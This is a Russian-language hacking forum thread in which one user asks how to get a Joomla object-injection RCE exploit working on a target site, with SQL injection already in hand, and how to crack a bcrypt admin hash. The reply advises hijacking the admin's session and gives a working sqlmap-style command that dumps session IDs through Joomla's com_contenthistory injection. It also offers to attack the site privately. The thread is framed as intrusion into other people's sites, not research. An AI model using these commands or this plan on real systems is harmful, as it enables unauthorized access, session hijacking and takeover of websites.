
10.03.2017, 04:44
|
|
Новичок
Регистрация: 10.10.2015
Сообщений: 17
С нами:
5575286
Репутация:
0
|
|
Сообщение от ACat
↑
Парни подскажите решение задачки:
джумла 3.4.3
Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution (который записует шелл туда, где можно пописать)
есть SQL Inj вполне рабочая
при обращении к файлу с расширением php получаем No input file specified. (не распространяется на папку administrator)
Есть пути сервера.
Вопрос, как понять что нужно, что бы заработал сплоит? возвращает 200
И еще, подскажите пожалуйста, как брутится соленый хеш от джумлы такого вида?
$2y$10$rla38JSwQPTNw6lEyvekK.tyWSm2vdZyGCMDa.eb9FT 6Jtoftz4E.
К нему нужна соль? Если да, то где ее искать.
Зарание спасибо.
1. Чтобы РСЕ сработал, нужно что бы еще и сам сервак был определенной версии
Проверять вот тут https://scan.patrolserver.com/joomla/CVE-2015-8562
2. Такой хеш НИЧЕМ не брутится.
=============================
Решение задачи:
1. Ждать пока админ зайдет на сайт, и спиздить сессию из таблицы xxxxx_sessions, только сначала посмотри последнюю дату визита админа. это может быть 1917 год и тогда это решение не прокатит. Если админ заходил на днях - лови его, через каждые 15 минут запускай
-u "САЙТ/index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=1&type_id=1&list[select]=*" --where="guest=0" --dump -D НАЗВАНИЕ_БД -T ТВОЙПРЕФ_session -C session_id
ps. Если не получится скинь сайт в личку, гляну что с ним делать
|
|
|